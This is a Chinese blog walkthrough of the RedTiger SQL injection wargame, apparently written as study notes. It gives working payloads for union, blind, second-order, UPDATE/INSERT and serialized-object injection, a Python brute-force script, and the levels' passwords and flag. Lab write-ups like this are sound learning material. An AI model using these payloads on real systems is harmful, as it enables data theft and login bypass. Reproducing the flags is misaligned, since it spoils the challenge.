SQL注入大闯关笔记

最新推荐文章于 2022-05-01 20:31:55 发布

Qter_Sean

最新推荐文章于 2022-05-01 20:31:55 发布

阅读量2.6k

点赞数 2

分类专栏：渗透测试文章标签： sql 渗透测试

本文链接：https://blog.csdn.net/yonug1107716573/article/details/114628399

版权

渗透测试专栏收录该内容

3 篇文章 0 订阅

订阅专栏

前言

随着国家对安全越来越重视，个人感觉每个人都需要了解一下安全方面的知识。学习安全，先要从靶场做起，说干就干。

一、SQL注入是什么？

所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造(或者影响)动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻击。（两点：1.用户有输入；2.用户的输入被当作代码执行）

二、靶场是什么？

通俗讲，就是新手练手学习的一个环境。

三、挖掘漏洞

下面从靶场开始做起。

1.redtiger靶场

位置：https://redtiger.labs.overthewire.org
准备的工具有：hackbar插件；ubantu20.04；phpstudy；pycharm；burp suite

1.第一关

位置：https://redtiger.labs.overthewire.org/level1.php
步骤：
1.点击“Category: 1”
2.构造payload，页面已经给出了Tablename：

https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users

3.得出用户名，密码。下一关

2.第二关

位置：https://redtiger.labs.overthewire.org/level2.php
步骤：
1.在用户名和密码处输入万能密码

1'or '1'='1

2.源码中密码那里的代码估计是

password=''

3.加入万能密码的payload后，变成了

password='1'or '1'='1'

下一关

3.第三关

位置：https://redtiger.labs.overthewire.org/level3.php
步骤：
1.点击“Admin”
2.在url栏中，usr后面加上[]，重新访问

https://redtiger.labs.overthewire.org/level3.php?usr[]=MDQyMjExMDE0MTgyMTQw

3.出现报错信息，下载错误信息中的加密函数文件

https://redtiger.labs.overthewire.org/urlcrypt.inc

4.将错误函数整理一下，写成.php文件，放入phpstudy(这里必须要是linux环境，我用的ubantu20.04)中运行，得出加密的字符串

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that	
	//$str就是自己写的payload
	$str = "Admin' order by 7-- +";
	$cryptedstr = "";
	srand(3284724);
	for ($i =0; $i < strlen($str); $i++)
	{
		$temp = ord(substr($str,$i,1)) ^ rand(0, 255);		
		while(strlen($temp)<3)
		{
			$temp = "0".$temp;
		}
		$cryptedstr .= $temp. "";
	}
	echo base64_encode($cryptedstr);
?>

5.linux环境如下：

root@ubuntu:/www/admin/localhost_80/wwwroot# ls
1.php  2.php  error
root@ubuntu:/www/admin/localhost_80/wwwroot# cat 2.php 
<?php

	// warning! ugly code ahead :)
	// requires php5.x, sorry for that	
	//$str就是自己写的payload
	$str = "Admin' order by 6 -- +";
	$cryptedstr = "";
	srand(3284724);
	for ($i =0; $i < strlen($str); $i++)
	{
		$temp = ord(substr($str,$i,1)) ^ rand(0, 255);		
		while(strlen($temp)<3)
		{
			$temp = "0".$temp;
		}
		$cryptedstr .= $temp. "";
	}
	echo base64_encode($cryptedstr);
?>
root@ubuntu:/www/admin/localhost_80/wwwroot#

6.手注，字段测试：

//先用8个字段测试，得出加密字符串，放进url中，报错了
$str = "Admin' order by 8 -- +"; ==>MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMxMDY1MTc2MDcxMDQ1MTky
//再用7个字段测试，得出加密字符串，放进url中，没有报错
$str = "Admin' order by 7 -- +"; ==>MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky
https://redtiger.labs.overthewire.org/level3.php?usr=MDQyMjExMDE0MTgyMTQwMTc0MjIzMDg3MjA4MTAxMTg0MTQyMDA5MTczMDA2MDY5MjMyMDY1MTc2MDcxMDQ1MTky

7.手注，发现显示位为：
Username: 2
First name: 6
Name: 7
ICQ: 5
Email: 4

//payload
$str = "1' union select 1,2,3,4,5,6,7 #";==>MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MTc1MDcwMDYyMTk5MjM1MjE5MDgxMjQ2MTUyMjA4MTc4MTA4MTUw

8.手注，得到flag：

//payload
$str = "1' union select 1,username,3,4,5,password,7 from level3_users where username='Admin' #";==>https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0
https://redtiger.labs.overthewire.org/level3.php?usr=MDkwMTQ0MDY3MTcwMTQwMjI0MTQ0MDg2MTMwMTE0MTg0MTQ0MDc2MTcyMDExMDY5MjM4MDc3MjMyMDI1MTA0MTUzMTc3MTUwMDA5MTkxMTMwMjA3MTY5MTIwMTUzMTk3MDQwMTA0MTc3MTQ5MjA5MTg0MTEzMDU0MTgwMjA4MTE4MjE4MTcwMTc4MDE1MTk4MDAyMTQ2MTE1MDcwMTQzMTU0MDI3MDE3MTY1MTY0MDQ3MDM2MDgwMjIzMDQ4MDc5MTI1MTAxMTA3MTU1MTQ2MDk0MTU0MjAyMDY4MDMyMjIzMTQ3MDYzMDUyMjI3MDY1MTI3MjA4MDU5MjE5MTQzMDk0

Username:	Admin
First name:	thisisaverysecurepasswordEEE5rt

下一关

4.第四关

位置：https://redtiger.labs.overthewire.org/level4.php
步骤：
1.无论在用户名和密码处还是在url中输入万能密码，都没有办法试出错误
2.尝试在url中，输入sleep(5)，看看是不是延迟盲注，果然是的

https://redtiger.labs.overthewire.org/level4.php?id=1 and sleep(5)

3.开始猜字段的长度

//开始使用20的长度试试看，页面没有变化：Query returned 0 rows. 
and (select length(keyword) from level4_secret limit 0,1)=20 #
//然后使用21的长度试试看，页面有变化：Query returned 1 rows. 说明21就是字段长度
and (select length(keyword) from level4_secret limit 0,1)=21 #
https://redtiger.labs.overthewire.org/level4.php?id=1%20and%20(select%20length(keyword)%20from%20level4_secret%20limit%200,1)=21%20#

4.开始猜字段的值

//开始使用107(k的ascii=107)试试看，页面有变化：Query returned 1 rows. 说明k就是值的第一个字母
and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),1,1)))=107 #
//接着使用105(i的ascii=107)试试看，页面有变化：Query returned 1 rows. 说明i就是值的第二个字母
and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #
https://redtiger.labs.overthewire.org/level4.php?id=1 and (ascii(substr((select keyword from level4_secret limit 0,1),2,1)))=105 #

5.写一个脚本跑一下

import requests
import time

url = "https://redtiger.labs.overthewire.org/level4.php?id=1"
cookies = {
    'level2login': 'passwords_will_change_over_time_let_us_do_a_shitty_rhyme',
    'level3login': 'feed_the_cat_who_eats_your_bread',
    'level4login': 'put_the_kitten_on_your_head'
}
keyword = []
#字段长度是21
for pos in range(1,22):
	#从ascii中的 ！ 一直跑到 del 字符
    for num in range(33,127):
        payload = url + " and (ascii(substr((select keyword from level4_secret limit 0,1)," + str(pos) + ",1)))=" + str(num) + " #"
        target = requests.get(url=payload, cookies=cookies)
        if "Query returned 1 rows." in target.text:
            # print(chr(num))
            keyword.append(chr(num))
            print(chr(num))
            break
        time.sleep(1)
print(keyword)

6.得出结果：killstickswithbr1cks!
下一关

5.第五关

位置：https://redtiger.labs.overthewire.org/level5.php
步骤：
1.在username和password处分别尝试万能语法，得出错误提示

1' or 1=1'
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /var/www/html/hackit/level5.php on line 46

2.根据错误信息，得出参数为1，盲猜，开发的用的登录语句是：

select username password from table where username='xxx'

3.然后将得到的密码勇md5加密后，与数据库的密码做对比，所以构造一下payload：

username:' union select 1,md5(23)#
password:23
//只要md5()里面的内容和密码一样就行

下一关

6.第六关

位置：https://redtiger.labs.overthewire.org/level6.php
步骤：
1.在“user=1"后面加’，得出存在SQL注入
2.接着就是order by了

//order by 1,2,3,4,5,6,7 出错
https://redtiger.labs.overthewire.org/level6.php?user=1 order by 1,2,3,4,5,6,7
//尝试order by 1,2,3,4,5 没有出错，得出有5个字段

3.常规流程，找出显错位

' union select 1,2,3,4,5
https://redtiger.labs.overthewire.org/level6.php?user=1' union select 1,2,3,4,5

4.经尝试，发现显错位是在第二个字段，得出Username:admin

' union select 1,username,3,4,5
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,username,3,4,5 from level6_users where status = 1 #

5.然后测试password：

http://redtiger.labs.overthewire.org/level6.php?user=1 union select 1,username,3,password,5 from level6_users where status = 1 #

6.经测试发现，无论password放在那个字段都不行，于是猜测是二次注入：

//开发人员的思路可能是：1.用id查到username；2.用username查询username和email，所以注入代码也要更改成二次注入
//第一条SQL语句
union select 1,username,3,4,5 from level6_users where status = 1 #
//第二条SQL语句
union select 1,username,password,4,5 from level6_users where status=1 #
//拼接上面2条语句，将第一条的username换成第二条的SQL语句
union select 1,' union select 1,username,password,4,5 from level6_users where status=1 #,3,4,5 from level6_users where status = 1

7.发现报错了，将第二条SQL语句进行16进制转换，再次尝试

//为了的概率的获取username和password，我把5个字段全部填满了，在进行16进制转换
' union select username,username,password,password,password from level6_users where status=1 #
//转换后的结果是
0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023
//再塞进第一条语句,注意：此处不要在user=0后面加单引号‘
union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1
http://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,0x2720756e696f6e2073656c65637420757365726e616d652c757365726e616d652c70617373776f72642c70617373776f72642c70617373776f72642066726f6d206c6576656c365f7573657273207768657265207374617475733d312023,3,4,5 from level6_users where status = 1

8.拿到username和password

Username: 	admin
Email: 	m0nsterk1ll

9.备注：为什么需要二次注入？下面从开发者源码的角度分析一下，此处可能的源码是：

//此处进行了2次SQL查询
$sql="select username,password from level6_users where id=1";
$result=mysql_query($sql) or die('<pre>'.mysql_error().'</pre>');
$row=mysql_fetch_row($result);
$username=$row1[1];
$sql2="select username,email from level6_users where username="."'".$username."'"

下一关

7.第七关

位置：https://redtiger.labs.overthewire.org/level7.php
步骤：
1.在输入框处输入单引号‘测试，发现报错

//此处爆露出5个字段
SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')

2.经测试，发现#被禁用了，但是%a0没有，于是就用 ”-- “来注释，空格用%a0来代替。通过burp suite抓包，在repeater模块重放

//payload
POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

search=1%') union select 1,2,3,4 --%a0&dosearch=search%21

3.页面给出了显示位4和3，更换payload，重放数据包

POST /level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php HTTP/1.1
Host: redtiger.labs.overthewire.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://redtiger.labs.overthewire.org/level7.php?http:%2f%2fredtiger.labs.overthewire.org%2flevel7.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: http://redtiger.labs.overthewire.org
Connection: close
Cookie: level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

search=google%') union select 1,2,3,autor from level7_news --%a0&dosearch=search%21

4.得出返回包

HTTP/1.1 200 OK
Date: Wed, 17 Mar 2021 08:15:39 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2906
Connection: close
Content-Type: text/html; charset=UTF-8


		<b>Welcome to Level 7</b><br><br>
		Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
		Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
		<br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
	<b>Google: The browser is the computer</b><br>SAN FRANCISCO--Google spent Wednesday morning trying to get developers excited about the next generation of Web technologies by showing off how future Web applications will mimic desktop apps.

"It's time for us to take advantage of the amazing opportunity that is before us," said Google CEO Eric Schmidt, kicking off Google I/O 2009 in San Francisco. Schmidt was referring to the growing sense that the Internet and browsers--rather than a computer's operating system--will be the future foundation for application development.

The industry isn't quite ready for that yet. Many of applications demonstrated before the crowd of around 4,000 developers will require the widespread adoption of HTML 5 technologies, which are still under development by a consortium of companies and organizations.

Still, Google's Vic Gundotra, vice president of engineering, noted that the four modern open-source browsers (Firefox, Safari, Chrome,and Opera) are all adopting some HTML 5 technologies as they become more stable, taking every opportunity possible to ding Microsoft's Internet Explorer for lagging behind the other four browsers.

Gundotra showed off how Web applications will be able to take advantage of five main HTML 5 concepts: canvas tags, video tags, geolocation, application caching and database, and Web Workers.

For example, canvas tags help developers bring all kinds of sophisticated graphics to their Web applications without having to use a plug-in--which is also the appeal of the video tag. Google showed off an "experiment" with YouTube videos coded using the video tags, which gives developers quite a few more options when it comes to how those videos can be embedded into a Web page.

Geolocation is another huge topic of late with mobile applications. Google showed off how its Google Latitude application takes advantage of a new iPhone geolocation API that Apple will release as part of the iPhone 3.0 software to run in the mobile Safari browser. Mozilla's Jay Sullivan also showed off how Firefox 3.5 will come with a button that allows the browser to pinpoint your location in Google Maps using Wi-Fi and cell tower positioning data.<br><br><br><b>site_admin</b><br>3<br><br><br><b>press</b><br>3<br><br><br><b>TestUserforg00gle</b><br>3<br><br><br><b>apple</b><br>3<br><br><br>
			<br>
			<form method="post">
				Username: <input type="text" name="username"><br>
				<input type="submit" name="try" value="Check!">
			</form>
			<br>

5.仔细观察返回包，注意到有一行，都试一下每个username即可，下一关

Geolocation is another huge topic of late with mobile applications. Google showed off how its Google Latitude application takes advantage of a new iPhone geolocation API that Apple will release as part of the iPhone 3.0 software to run in the mobile Safari browser. Mozilla's Jay Sullivan also showed off how Firefox 3.5 will come with a button that allows the browser to pinpoint your location in Google Maps using Wi-Fi and cell tower positioning data.<br><br><br><b>site_admin</b><br>3<br><br><br><b>press</b><br>3<br><br><br><b>TestUserforg00gle</b><br>3<br><br><br><b>apple</b><br>3<br><br><br>

8.第八关

位置：https://redtiger.labs.overthewire.org/level8.php
步骤：
1.在Email处输入单引号’，报错了，说名存在注入
2.在Name处输入单引号’，直接给出了Username: Admin
3.根据报错，猜测源码那块是update语句，字段顺序为name,email，icq，age

update table_name set name = 'xxx', email = 'xxx', icq = 'xxx', age = xxx where id = 1

4.构造payload，将password赋值给name，然后显示在页面中

',name = password,email = '
//拼接成完整的SQL语句后，是这样的
update table_name set name = ' ',name = password,email = ' ', email = 'xxx', icq = 'xxx', age = xxx where id = 1

5.在Name处显示出了密码，下一关

9.第九关

位置：https://redtiger.labs.overthewire.org/level9.php
步骤：
1.在提交框里面发现有SQL注入
2.尝试注入看看

') union select 1,2,3,4,5 from level9_users --%0a

3.没有反应，后面听说是insert函数报错，源代码可能是这样的

printf("INSERT INTO listing (name, title, text) VALUES (%s,%s,%s)", $name,$title,$text);

4.开始构造个payload

'), ((select username from level9_users), (select password from level9_users), '
//还原成源码里面是这样的：
INSERT INTO listing (name, title, text) VALUES ('','',''), ((select username from level9_users), (select password from level9_users), '')
//这样就插进去2条数据了，最后一条就是我们要查询的信息

5.得到结果：

Autor: TheBlueFlower
Title: this_oassword_is_SEC//Ure.promised!

最后一关

10.第十关

位置：https://redtiger.labs.overthewire.org/level10.php
步骤：
1.页面只有一个button，这势必要用burp suite抓包测试了
2.开启bp，点击按钮，抓包，放到repeater里面

POST /level10.php HTTP/1.1
Host: redtiger.labs.overthewire.org
Connection: close
Content-Length: 112
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://redtiger.labs.overthewire.org
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://redtiger.labs.overthewire.org/level10.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,fr;q=0.5,fil;q=0.4
Cookie: __utma=176859643.967972366.1612269538.1612269538.1612269538.1; __utmz=176859643.1612269538.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); level2login=passwords_will_change_over_time_let_us_do_a_shitty_rhyme; level3login=feed_the_cat_who_eats_your_bread; level4login=put_the_kitten_on_your_head; level5login=this_hack_it%27s_old; level6login=the_stone_is_cold; level7login=shitcoins_are_hold; level8login=or_so_i%27m_told; level9login=network_pancakes_milk_and_wine; level10login=whatever_just_a_fresh_password

login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login

3.将原始的payload中的login拿出来，解密一下，根据经验是base64加密的，解密结果是

//原始数据
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//解密结果
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}

4.把"Monkey"改为"TheMaster"，重新加密，放过去

//修改后
a:2:{s:8:"username";s:6:"TheMaster";s:8:"password";s:12:"0815password";}
//加密
YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9
//放包
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjY6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9&dologin=Login

5.报错，反序列化之类的。再看payload中的"password"字段，设置的是12位的string，尝试改为bool类型，值为1

//修改后
a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
//加密
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
//放包
login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login

6.看界面变化

Welcome TheMaster.
You solved the hackit :)

You can raise your wechall.net score with this flag: 721ce43d433ad85bcfa56644b112fa52


The password for the hall of fame is: make_the_internet_great_again

7.通关留名
在这里插入图片描述

总结

1.好在要防止ASP.NET应用被SQL注入式攻击闯入并不是一件特别困难的事情，只要在利用表单输入的内容构造SQL命令之前，把所有输入内容过滤一番就可以了（不要相信用户的任何输入）。
2.这些渗透测试的黑客真的异于常人。
3.平时多总结，看看网上别人的做法，自己多积累经验。

Qter_Sean

关注

2
点赞
踩
7

收藏

觉得还不错? 一键收藏
打赏
10
评论
SQL注入大闯关笔记

目录前言一、SQL注入是什么？二、靶场是什么？三、挖掘漏洞1.redtiger靶场1.第一关2.第二关3.第三关总结前言随着国家对安全越来越重视，个人感觉每个人都需要了解一下安全方面的知识。学习安全，先要从靶场做起，说干就干。一、SQL注入是什么？所谓SQL注入式攻击，就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串，欺骗服务器执行恶意的SQL命令。在某些表单中，用户输入的内容直接用来构造(或者影响)动态SQL命令，或作为存储过程的输入参数，这类表单特别容易受到SQL注入式攻
复制链接

扫一扫